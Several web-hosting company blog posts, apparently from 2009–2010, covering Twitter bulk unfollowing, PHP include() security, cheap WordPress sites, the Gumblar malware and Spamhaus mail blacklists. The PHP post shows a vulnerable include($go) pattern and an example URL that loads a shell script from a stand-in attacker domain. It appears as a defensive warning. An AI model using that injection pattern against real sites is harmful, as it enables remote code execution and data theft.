I haven’t “tweeted” for a long time. I joined Twitter on the general bandwagon last year, downloaded and installed TweetDeck – and pretty much forgot about it. I did turn on Auto-Follow via SocialOomph though. So a year later I have 3,000 followers and maybe 50 are HostNexus clients and people I know. So 2,950 people have followed me for the sole reason of spamming me with links to their sites. They don’t care what I say because, well, I say very little. If I’m ever going to really use Twitter I need to follow only those I have a general interest in following and that is people I choose to follow and any past, present or prospective clients of HostNexus.

So today I went on a mission to purge my Twitter account.

As most people in Twitterdom know, there are thousands of apps that help you manage your Twitter account, so I thought that mass unfollowing on Twitter was going to be pretty simple. I tried several tools but all either had no Bulk Unfollow option or no Select All option. I started hitting Unfollow on people on Twitter Karma but that got real old after about 100 clicks. I then start hitting checkboxes on Tweepi and Untweeps but another 150 clicks later my right index finger started to cramp up in a death grip from hell. But both Tweepi and Untweeps do not list all your followers so it was kind of pointless anyhow. I then found ManageFlitter which listed all your followers in pages of 100 with checkboxes, but of course no Select All option.

I did some digging and found out that Twitter had put their foot down on Mass Unfollowing in April of this year (2010). All applications either had to remove Bulk Unfollow options or the Select All option to continue to operate within Twitter’s update TOS. Pretty ridiculous. I can understand enforcing a Bulk Unfollow option but telling developers to remove a “Select All” option? Very weird. But it got me thinking. The Select All thing is just a JavaScript call and happens in your browser so surely there should be a nifty little FireFox plugin that allows me to Select All?

Yes! There is.

A plugin is available for FireFox 3.0 called Check All but it doesn’t work in FireFox 3.6 that I’m currently using. After another plugin search I found an experimental plugin which is an updated version of Check All and you can find it here. There is another one here (thanks backy). Mozilla will give you all types of warnings about the first plugin, saying it hasn’t been verified and that your computer might grow legs and jump out the window if you install it. It works just fine. Install it. Restart FireFox, rawr.

Next go to ManageFlitter and login via Twitter Oauth. Click “Show All” and you’ll be presented with a list of your followers in pages of 100 with a checkbox next to each and an Unfollow button on the left. Hit Ctrl+A (Select All, yes baby), right click on a highlighted area and you’ll see the new plugin option “Check All Selected Checkboxes”, click Unfollow.

Unfollowing 100 people on Twitter in one go is a beautiful thing to behold.

Click Next, Ctrl+A, Right Click, Select All Checkboxes, Unfollow. Boom, another 100 Tweeps bite the dust. Rinse and repeat. I got it down to 5 seconds per page, that’s a 1,000 in under a minute. Bye Tweeps.

P.S. If you’re one of the 12 invisible people I’m still following….my hat goes off to you for evading the purge.

P.P.S. Damn, those Unfollow programs are quick. 600 people auto-unfollowed me already!. I’m crushed. :p

Post from: HostNexus Blog

How To Bulk Unfollow On Twitter in Minutes

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

< ?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

< ?php
   ('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

< ?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these fuctions then please do revisit your code and help yourself to secure your data and server.

Laurence

Post from: HostNexus Blog

PHP Security and YOU – Including files the right way

Ten or even five years ago putting up a website was expensive and took time. But times have changed and time, money and skills (or lack thereof) are no longer obstacles would-be webmasters have to deal with. If you’ve ever thought about getting a nice website online but have always dreaded the task, here are my 7 Steps To Get Online.

1) Register Your Domain Name

This is always the starting point for any new website project. Your website will need a name so register domain. This will be less than $15 for teh year. HostNexus, for example, sells .com domains for $12.95/yr from our registry site NexusDomains. Unless you are looking for a specific country TLD such as .com.au or .co.uk then I always recommend you try and get the .com AND the .net. Usually if a .com is registered and in use I would not register the .net to ensure against brand dilution but there are always exceptions (such as our NexusDomains on a .net).

2) Get Some Simple Web Hosting

We’ll be using WordPress and this works best on Linux Hosting. So before you start find a Cheap Hosting plan such as our entry level nexusONE plan. This will be your first expense and will cost you less than $50 for the year. You could even cut down costs more and get hosting on a monthly plan but the yearly costs will usually end up being more (such as $7.95/mo).

2) Install WordPress

WordPress is the de-facto blogging software these days but it is much more than a blog. WordPress has evolved into a full-blown Content Management System (CMS) and the possibilities with it are endless. Installing it is incredibly simply and mosts (including HostNexus) provide an auto-installer for many popular programs including WordPress. If you have issues with the install your hosting company will certainly assist you (if not, well you should be with HN of course).

3) Find And Install A WordPress Theme

This is where the fun starts. A WordPress theme these days is much more than a simple skin for WordPress. The theme will control a lot of your site’s functionality as WordPress developers include many custom scripts and programs with their themes. The best place on the internet for WordPress themes is undoubtedly ThemeForest. There are literally hundreds of amazing themes there and more are added almost daily. ThemeForest is a place where developers showcase their work so there are many developers and most provide good support in Q&A threads on their showcase pages. I have personally bought 3 themes there for personal project and recommend it highly. Themes vary in price with $35 being the most expensive so not very expensive at all.

Theme install comprises of uploading the theme folder and activating it in the WordPress admin panel. Easy stuff that we love.

So to recap we have $12.95 for a domain name, less than $47.40 for hosting and $35 max for a theme. We are at under $100 and a few hours into our project.

4) Find A Logo Designer

Having a great logo is essential for all corporate sites and recommended even for personal sites. You could spend literally hundreds of dollars on a logo for your site but that is just not necessary. When I start up a new site I normally hire 3 different logo designers so I many concepts to choose from. Last year I hired 4 logo designers for a project ranging from $20 to $200 per designer. And believe it or not I ended up choosing a logo developed for $29. Here are a few designers I’ve worked with and all cost less than $30:

• 19dollarlogos.com
• iigfx.net
• 20dollarlogo.com
• logonerds.com

Find a designer that will include at least 2 different concepts. For best results hire 2 different designers so you get at least 4 fresh concepts.

5) Find A WordPress Designer

So you have your domain, hosting, installed WordPress, purchased a great theme and you have a nice logo. However, it is unlikely that your theme will be exactly the way you want it. You may want to change a colour here, put an image there, add a button over there, customise the styling on this or that page. As you play around with your WordPress install and upload content you’ll start to formulate a list of things that you want to change. And it’s always a good idea to change your theme a bit so that your design is unique as it’s likely that 50 or 100 other sites might be using the same theme. So the final step is to find a designer that will do all of your modifications. I usually find designers on . Post a thread in the Buy/Sell > Services > Design forum and wait for offers. Generally you can get small WordPress theme modifications done for around $50. Select your provider carefully! Choose a designer with an established website with portfolio and lots of positive feedback as there are a few unsavoury and unreliable people haunting the forum. Arrange to pay half in advance and half on completion of the job. Payment is always by PayPal.

6) Publish Your Content

You can start plugging in your content as soon as you’ve installed WordPress and can continue while designers work on your logo and WordPress modifications. Publish your pages and articles and you’re done!

And there you have it. A professional, great looking website complete with logo online in less than a week and less than a $199. So what’s stopping you? Get out there and start building your online presence. Who knows where it will lead you.

Post from: HostNexus Blog

How To Get A Professional Website Online Within One Week, For Less Than $199, And No Design Experience

2009 is The Year Of The Gumblar. You might not know the name but I’m sure you’ve experienced it either directly (hopefully not) or indirectly. Have you ever been surfing and come across a page with a big red sign warning against you entering the site? If you have then it’s a good chance that site was hit with Gumblar or one its variants like Nine Ball, Martuz or a host of other weird and wonderful names. If you run a successful online business can you imagine the damage such an attack could do? I actually got hit with it on a personal site I just use for storing photos. But when I thought of the damage it would have done if it had hit HostNexus……it certainly got my attention.

So what is Gumblar and how does it work? These are things EVERY webmaster MUST know! The original Gumblar used a vulnerability in Adobe Acrobat and Flash player but subsequent variants use other exploitable software but all have the same end result. I won’t go into the technicalities of how your computer gets infected but you need to know what it does. Once infected it listens in on any FTP connections and steals the connection information. Usually within minutes the virus uses your FTP account to modify files and insert some nasty code. This code is normally an iframe, javascript or some other code that triggers a malware download from another computer.

The virus will sometimes modify PHP code and insert phpshell scripts which in turn attempt to install the malware that other infected sites connect to to trigger malware downmloads to unsuspecting site visitors. This is a three-pronged nightmare that just grows exponentially. From local computer to FTP account to server infection and the wheel keeps on turning. So what’s the defence?

The virus three-pronged and therefore everyone needs to cover as many of these vulnerabilities as posible.

1) Your Computer – a decent “On-Access” anti-virus program is all you need. When I got infected I was running a cheap AV program that wasn’t On-Access. This simply means the AV program automatically scans anything that is downloaded to your computer or any file that you open on your computer. If your anti-virus just gives you a daily scan you are NOT protected. You could get infected, download some nasty stuff to your computer and proliferate the virus before you even get to your daily scan.

2) FTP over SSL. If you are on a linux server simply choose a connection option in your FTP program that is encrypted or just says “SSL”. All of our shared servers should have this working. If you find it doesn’t please contact Support and we will fix it! With this option your connection info is sent encrypted and not in plain text and the virus cannot sniff it out. We would love to implement this by default (forcing people to use it) but even though we could post about it in a newsletter, on a mail list, on our blog and on our forum we will still get hundreds of tickets asking via their FTP doesn’t work. As awareness grows maybe we will implement slowly.

If you have a dedicated server and would like FTP over SSL activated please contact Support.

Bad news for Windows clients on this front. Our Windows servers don’t currently support FTP over SSL as this is a feature included in the newer Windows 2008 OS with IIS7. It’s a huge change and one that we aren’t quite ready for. But you can still install a decent Anti-Virus program.

3) Server Infection – this is one area where Windows servers aren’t as vulnerable. The virus uses PHP which needs to be running as a global user such as Apache. PHP on Windows has run under a user’s FTP username as CGI for ages so even if files get infected the virus cannot break out of the user’s home directory. On linux though PHP has ran as Apache for aeons and it’s only with later versions of Plesk that we now have the option to run PHP as CGI or FastCGI. So if you’re on Plesk 9 I encourage you to switch PHP to a Fast CGI application under Web Host Settings for the domain. Some scripts can break with it so if you are not sure please don’t hesitate to contact support and we will advise you. Scripts tend to run faster under Fast CGI too so you are in fact doing yourself a service.

This year we’ve been dealing with Gumblar related issues almost on a weekly basis. It is very hard to convince someone that the server hasn’t been hacked when their website is showing the Reported Attack Site page. In these cases the issue almost always lies with the user’s computer being infected.

But we have also had cases where the virus has spread through Apache-owned PHP files causing malicious downloads and random page redirects to search results containing a list of infected sites. We can always track down the source but it is very frustrating for us as hosts and our users. In this case a solution would be force every domain using PHP to run as Fast CGI but as with the FTP solution there would be even more fallout. So it’s a balancing tightrope act with a bit of a dodgy safety net. All we can do as hosts is raise our own community’s awareness of this problem that doesn’t seem to be going away any time soon and hope that in the future we can implement more stricter safeguards against this menace.

I just posted this on our blog so feel free to comment there. If you’d prefer to discuss any of this in our forum that would also be most welcome.

Post from: HostNexus Blog

Gumblar – How To Avoid Getting Hacked

How would like to reduce the amount of spam coming into your mailbox by 90%?

Yes…..90%.

It can be done and it can be done very easily but for many the price might be too high.  See, the fight against spam is kind of a catch 22.  There is no solution out there that, even if it works great, won’t aggravate some users.  For web hosts this is particularly painful.  A host’s client base often demands less spam but in my experience they are unwilling to pay the price.  This is why most hosts just let the email flow and give their clients end-user tools with which to fight spam – and on the whole it works well. By using SpamAssassin and some filters I generally don’t see much spam in my inbox. On average maybe 5-10 per day. The rest gets tagged and filtered. I can certainly live with that – but some people can’t.

So what other options are available to us as a web hosting provider? The most popular option is to use Blacklists. These are lists generated and maintained by external providers. We can set our servers to check mails against these lists and if they are listed we reject the mail. The most popular list is SpamCop which I’m sure almost everyone has heard of. There are literally hundreds of lists out there. Some are public, some are private, some are good and some are terrible. There are some lists that if you get on it you simply can’t get removed or have to pay to be removed. These are the bad ones but relays like SpamCop are good as you can delist and on some if your server doesn’t send anymore spam the entry can automatically delist. SpamCop works like this and it works well but it is far from perfect. Even with SpamCop your server can accept alot of spam.

Another great Blacklist is SpamHaus and we have this deployed on all servers. However, there are different levels of spam protection that are offered by SpamHaus:

1) The Spamhaus Block List – sbl.spamhaus.org.

In their own words:

The SBL is a realtime database of IP addresses of verified spam sources and spam operations (including spammers, spam gangs and spam support services), maintained by the Spamhaus Project team and supplied as a free service to help email administrators better manage incoming email streams.

2) The Exploits Block List – xbl.spamhaus.org.

To quote:

The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of hijacked PCs infected by illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.

It’s basically a list that incorporates two other RBLs – cbl.abuseat.org and www.njabl.org.

We use both of these as standard and query SpamHaus using sbl-xbl.spamhaus.org.

3) The Policy Block List – pbl.spamhaus.org.

This is what sets SpamHaus apart from all the other RBLs. To quote their site:

The Spamhaus PBL is a DNSBL database of end-user IP address ranges which should not be delivering unauthenticated SMTP email to any Internet mail server except those provided for specifically by an ISP for that customer’s use. The PBL helps networks enforce their Acceptable Use Policy for dynamic and non-MTA customer IP ranges.

If you use all 3 Blacklists that is then zen.spamhaus.org. We put zen.spamhaus.org on some servers a few weeks ago but right away we got complaints from users who couldn’t send mail because their ISP was listed in pbl.spamhaus.org. Remember that most spam on the net doesn’t come from servers like we run but it comes from viruses on people’s computers that send spam via Outlook unbeknownst to the infected user. So yes, many ISP IPs are listed and for good reason – 95% of all spam originates from sources like this.

So we removed zen.spamhaus.org and kept sbl-xbl.spamhaus.org. I thought it best that all users at HostNexus get involved and we have a community discussion before implementing it again. But remember, even if you find you can’t send mail due to being listed by zen all you need do is follow the link in the bounced mail failure and delist your IP – it is really simple. To quote SpamHaus again:

IP Address Self-Service Removal Mechanism

A feature of the PBL is the elimination of ‘false positives’ with a server-identifying and automatic removal mechanism for single IP addresses. This allows end users with static IP addresses within a larger dynamic pool, and legitimate mail server operators, to assert that in their opinion their IP addresses are a trustworthy source of email and to automatically remove (suppress) their IP addresses from the PBL database. Safeguards are built in to prevent abuse of this facility by spammers (and particularly by automated bots).

I fully tested zen.spamhaus.org on our server and these are the resuts average over 3 mail accounts in a 24 hour period:

• No SpamHaus (only SpamCop): 165 spam tagged/10 spam untagged
• With sbl-xbl.spamhaus.org: 105 spam tagged/7 spam untagged

(drumroll)

• With zen.spamhaus.org: 10 spam tagged/1 spam untagged

You have to admit, that is pretty awesome.

But lets recap the downsides if we implement Zen:

1) Some people might have issues sending you mail. If they are savvy enough they can click the link in the bounced mail and delist quickly but alot of people are not going to do that. Some might contact their host or ISP to get it resolved. Some just might not send that email.

2) You (or your users) might not be able to send mail. The upside of this downside is that you are all web savvy and know to delist.

I have posted a discussion thread with poll on our forum. Please comment here or in that thread and vote on that poll. This would be a great thing to implement but everyone needs to be aware of it before we do and know how to resolve any issues if they experience them.

Thanks for your time.

Post from: HostNexus Blog

The zen of SpamHaus